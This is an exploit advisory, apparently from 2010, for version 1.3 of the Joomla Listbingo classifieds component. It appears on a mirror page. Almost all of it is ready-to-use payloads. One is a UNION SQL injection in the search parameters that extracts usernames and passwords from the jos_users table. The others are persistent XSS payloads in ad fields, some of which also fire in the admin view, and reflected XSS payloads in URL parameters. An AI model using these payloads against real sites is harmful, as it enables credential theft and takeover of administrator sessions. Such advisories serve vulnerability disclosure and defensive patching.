扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
# Exploit Title: Joomla Component Listbingo 1.3 Multiple Vulnerabilities # Date: 09 June 2010 # Author: jdc # Software Link: http://extensions.joomla.org/extensions/ads-a-affiliates/classified-ads/12062 # Version: 1.3 # Tested on: PHP5, MySQL5 SQL Injection ------------- ?q=11111 &catid=0 &search_from_price=999 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat(username,char(32),password),32,33,34,35,36,37 from <code>jos_users</code> -- ' &search_to_price=2 &search=Search &task=ads.search &option=com_listbingo Persistent XSS -------------- ?option=com_listbingo&task=categories "Title" field: title"/style="position:absolute;top:0;left:0;width:99em;height:99em"/onmouseover="alert(1);// NOTE: also executes in admin if ad is edited --- "Address 2" field: addr"/onmouseover="alert(1);// "Zipcode" field: 10101"/onmouseover="alert(1);// NOTE: only executes in admin if ad is edited Reflective XSS -------------- ?option=com_listbingo &task=regions &cid=225 &time=1276063938 &Itemid=45"/style="position:absolute;top:0;left:0;width:99em;height:99em"/onmouseover="alert(1);// --- ?option=com_listbingo &task=ads &time=1276064182 &Itemid=45"/style="position:absolute;top:0;left:0;width:99em;height:99em"/onmouseover="alert(1);// --- ?option=com_listbingo &task=categories &Itemid=45"/style="position:absolute;top:0;left:0;width:99em;height:99em"/onmouseover="alert(1);// --- ?option=com_listbingo &task=myads &q=foo"/onmouseover="alert(1);// jdc 2010 |
体验盒子
